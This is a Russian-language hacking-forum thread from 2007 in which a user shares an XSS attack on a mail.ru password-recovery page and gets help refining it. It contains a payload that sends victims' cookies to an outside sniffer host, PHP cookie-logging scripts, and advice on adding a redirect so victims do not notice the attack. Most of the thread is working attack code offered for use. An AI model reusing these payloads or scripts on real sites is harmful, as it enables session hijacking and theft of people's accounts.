Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Как сделать редирект. Или что еще можно придумать? |
13.08.2007, 01:22
|
|
Новичок
Регистрация: 12.08.2007
Сообщений: 5
Провел на форуме:
32789
Репутация:
0
|
|
Как сделать редирект. Или что еще можно придумать?
Доброго всем времени суток!
Помогите пожалуйста разобраться... Я много читал статей, постов на этом форуме про XSS уязвимости и решил попробовать... вроде как все получается... Я создал страничку на народ.ру (index.html) со следующим содержимым:
Код:
<script>
document.location.href="http://content.mail.ru/cgi-bin/forgot.cgi?&email=<script src=http://MySite.narod.ru/js.js>";
</script>
// Кстати уязвимость уже закрыта... но дело не в этом
А в скрипте (Js.js) я пишу следущее:
Код:
img=new Image();img.src="http://www.s.netsec.ru/alloc.gif?"+document.cookie;
Все работает... НО!
При нажатии на ядовитую ссылку, естественно открывается та страничка где есть уязвимость... тоесть:
Код:
http://content.mail.ru/cgi-bin/forgot.cgi?&email=
И у меня такой вопрос...: Как сделать так чтоб кукисы варовались и после чего шел какойнибудь редирект например на другой сайт... чтоб пользователь не видел той странички на которой XSS? Просто так все очень паленна... Возможно такое? И как это осуществить? Надеюсь на вашу помощь уважаемые Хакеры! |
|
|
13.08.2007, 03:23
|
|
Новичок
Регистрация: 12.08.2007
Сообщений: 5
Провел на форуме:
32789
Репутация:
0
|
|
ettee, спасибо большое! Но что-то не получается... хотя вроде должно... Редирект происходит... а вот кукис не приходят...
Я делаю так:
Код:
<script>
document.location.href="http://content.mail.ru/cgi-bin/forgot.cgi?&email=<script src=http://MySite.narod.ru/js.js>";
document.location.replace('http://www.google.com');
</script>
Может быть я не туда это вписал? Подскажите плиз.
|
|
|
|
13.08.2007, 07:35
|
|
Участник форума
Регистрация: 25.10.2006
Сообщений: 108
Провел на форуме:
495411
Репутация:
91
|
|
Куки не приходят потому что скрипт не успевает сработать и перекидывает юзверя на другую пагу, поэтому редирект нужно добавить в JS.js.
Чтобы после того как скрипт снифа сработает шла переадресация.
|
|
|
|
13.08.2007, 12:40
|
|
Познающий
Регистрация: 27.10.2006
Сообщений: 90
Провел на форуме:
560577
Репутация:
68
|
|
поставь редирект в снифере, тоесть куки приходят на снифер, записываются в лог, а затем снифер пинает юзера дальше.
Что-то типа:
PHP код:
<?php
Error_Reporting(E_ALL & ~E_NOTICE);
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
$url='http://ya.ru';
header("Location: $url");
?>
Скрипт не проверял, но впринципе должно работать.
Последний раз редактировалось nbd; 13.08.2007 в 12:56..
|
|
|
|
13.08.2007, 12:51
|
|
Новичок
Регистрация: 12.08.2007
Сообщений: 5
Провел на форуме:
32789
Репутация:
0
|
|
Всем большое спасибо за помощь! Все вроде работает... конечно всеравно не так как я хотел...Страничка с Xss видна... но потом идет редирект... Так намного лучше.
Всем спасибо за помощь!  |
|
|
|
16.08.2007, 01:07
|
|
Новичок
Регистрация: 12.08.2007
Сообщений: 5
Провел на форуме:
32789
Репутация:
0
|
|
Что-то не получается у меня... Я вставил в скрипт js.js редирект - document.location.replace('http://www.google.com');... но он не всегда срабатывает... не знаю почему...
Пробовал добавлять следующую строку в снифер (s.gif... в конец скрипта...)... но все равно не получается...
PHP код:
$url='http://ya.ru';
header("Location: $url");
Я PHP не понимаю... Подскажите пожалуйста, уважаемые форумчане как именно осуществить Редирект в PHP... Вот сам скрипт снифера:
PHP код:
<?
define("FILE", "s.gif");
require "config.php";
require "functions.php";
cleaner();
$sniffed['date'] = date("d.m.Y H:i");
$sniffed['ip'] = $_SERVER['REMOTE_ADDR'];
$sniffed['referer'] = htmlspecialchars(stripslashes($_SERVER['HTTP_REFERER']));
$sniffed['query'] = htmlspecialchars(stripslashes(urldecode($_SERVER['QUERY_STRING'])));
$sniffed['agent'] = htmlspecialchars($_SERVER['HTTP_USER_AGENT']);
$sniffed['real_ip'] = htmlspecialchars($_SERVER['HTTP_X_FORWARDED_FOR']);
if (!preg_match("/^https?:\/\//i", $sniffed['referer'])) $sniffed['referer'] = "";
$data = array();
$data_content = get_file_content($data_filename);
if ($data_content !== NULL) $data = unserialize($data_content);
$entrie = serialize($sniffed);
$data[] = $entrie;
$data_content = serialize($data);
put_file_content($data_filename, $data_content);
show_image();
?>
Буду очень благодарен за помощь!
Заранее спасибо! |
|
|
|
16.01.2009, 21:18
|
|
Banned
Регистрация: 07.09.2008
Сообщений: 48
Провел на форуме:
127764
Репутация:
-1
|
|
Сообщение от Alloc
Что-то не получается у меня... Я вставил в скрипт js.js редирект - document.location.replace('http://www.google.com');... но он не всегда срабатывает... не знаю почему...
Пробовал добавлять следующую строку в снифер (s.gif... в конец скрипта...)... но все равно не получается...
PHP код:
$url='http://ya.ru';
header("Location: $url");
Я PHP не понимаю... Подскажите пожалуйста, уважаемые форумчане как именно осуществить Редирект в PHP... Вот сам скрипт снифера:
PHP код:
<?
define("FILE", "s.gif");
require "config.php";
require "functions.php";
cleaner();
$sniffed['date'] = date("d.m.Y H:i");
$sniffed['ip'] = $_SERVER['REMOTE_ADDR'];
$sniffed['referer'] = htmlspecialchars(stripslashes($_SERVER['HTTP_REFERER']));
$sniffed['query'] = htmlspecialchars(stripslashes(urldecode($_SERVER['QUERY_STRING'])));
$sniffed['agent'] = htmlspecialchars($_SERVER['HTTP_USER_AGENT']);
$sniffed['real_ip'] = htmlspecialchars($_SERVER['HTTP_X_FORWARDED_FOR']);
if (!preg_match("/^https?:\/\//i", $sniffed['referer'])) $sniffed['referer'] = "";
$data = array();
$data_content = get_file_content($data_filename);
if ($data_content !== NULL) $data = unserialize($data_content);
$entrie = serialize($sniffed);
$data[] = $entrie;
$data_content = serialize($data);
put_file_content($data_filename, $data_content);
show_image();
?>
Буду очень благодарен за помощь!
Заранее спасибо!
эту строку не надо в конец ставить а нaдо сюда ставить если помог ставь+
смотри весь код
обазначил спецально красным
<?
define("FILE", "s.gif");
require "config.php";
require "functions.php";
cleaner();
$sniffed['date'] = date("d.m.Y H:i");
$sniffed['ip'] = $_SERVER['REMOTE_ADDR'];
$sniffed['referer'] = htmlspecialchars(stripslashes($_SERVER['HTTP_REFERER']));
$sniffed['query'] = htmlspecialchars(stripslashes(urldecode($_SERVER['QUERY_STRING'])));
$sniffed['agent'] = htmlspecialchars($_SERVER['HTTP_USER_AGENT']);
$sniffed['real_ip'] = htmlspecialchars($_SERVER['HTTP_X_FORWARDED_FOR']);
$url='http://xaker.ru';header("Location: $url");
if (!preg_match("/^https?:\/\//i", $sniffed['referer'])) $sniffed['referer'] = "";
$data = array();
$data_content = get_file_content($data_filename);
if ($data_content !== NULL) $data = unserialize($data_content);
$entrie = serialize($sniffed);
$data[] = $entrie;
$data_content = serialize($data);
put_file_content($data_filename, $data_content);
show_image();
?>
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
